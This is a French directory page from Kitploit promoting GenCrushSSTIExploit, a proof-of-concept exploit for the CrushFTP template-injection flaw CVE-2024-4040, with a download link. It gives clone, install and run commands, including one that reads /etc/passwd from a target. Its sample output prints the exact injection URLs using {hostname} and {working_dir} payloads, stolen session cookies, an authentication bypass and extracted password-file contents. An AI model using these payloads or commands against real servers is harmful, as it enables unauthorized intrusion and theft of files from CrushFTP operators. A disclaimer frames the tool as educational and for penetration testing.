Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
GenCrushSSTIExploit — est un PoC pour l'outil CVE-2024-4040 exploitant la vulnérabilité SSTI dans CrushFTP | Kitploit
Outils/GitHubGitHub/geniuszly/gencrushsstiexploit
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentificationApprentissage et Éducation
GitHubgeniuszly/gencrushsstiexploit

GenCrushSSTIExploit

est un PoC pour l'outil CVE-2024-4040 exploitant la vulnérabilité SSTI dans CrushFTP

Voir le dépôt
81il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

FR

GenCrushSSTIExploit est un outil exploit PoC ciblant la vulnérabilité SSTI (Server-Side Template Injection) dans CrushFTP CVE-2024-4040. Cet outil démontre comment exploiter cette vulnérabilité à des fins éducatives et de test d'intrusion éthique uniquement.

Fonctionnalités

  • Établit une session avec le serveur CrushFTP pour extraire les cookies d'authentification.
  • Exploite la vulnérabilité SSTI pour injecter des charges utiles.
  • Tente de contourner l'authentification et d'extraire des fichiers sensibles du serveur.
  • Utilise rich pour une sortie console élégante et stylisée.

Avertissement

⚠️ Utilisez cet outil de manière responsable ! Il est destiné uniquement à la recherche et à des fins éducatives. L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par cet outil.

Installation

Prérequis

  • Python 3.7+
  • pip (gestionnaire de paquets Python)

Cloner le dépôt

root@kitploit:~
git clone https://github.com/geniuszly/GenCrushSSTIExploit
cd GenCrushSSTIExploit

Installer les paquets requis

root@kitploit:~
pip install -r requirements.txt

Utilisation

Commande de base

root@kitploit:~
python GenCrushSSTIExploit.py -t <URL_CIBLE>
  • -t / --target : Spécifie l'URL cible du serveur CrushFTP vulnérable.

Paramètres optionnels

  • -l / --lfi : Inclusion locale de fichier. Spécifie le fichier à inclure pour extraction.
  • -w / --wordlist : Spécifie une liste de mots pour forcer les chemins de fichiers.

Exemple

root@kitploit:~
python GenCrushSSTIExploit.py -t http://example.com -l /etc/passwd

Exemple de sortie

root@kitploit:~
★ Добро пожаловать в GenCrushSSTIExploit ★
CrushFTP SSTI PoC (CVE-2024-4040)
Автор: geniuszly
Использование: только для учебных и этических целей
--------------------------------------------------

[*] Подключение к ServerSessionAJAX...

[+] Успешно подключено к ServerSessionAJAX
[+] Куки CrushAuth: abc123def456ghi789
[+] Куки currentAuth: xyz987

[*] Попытка эксплуатации уязвимости SSTI...

[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={hostname}&names=/a

[+] Успешная эксплуатация уязвимости SSTI
[+] Ответ сервера: Hostname: example.com

[*] Попытка обхода аутентификации...

[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={working_dir}&names=/a

[+] Обход аутентификации успешен
[+] Извлечение /etc/passwd...
[+] Успешное извлечение /etc/passwd
[+] Извлеченное содержимое:
root:x:0:0:root:/root:/bin/bash
...
Télécharger l’outil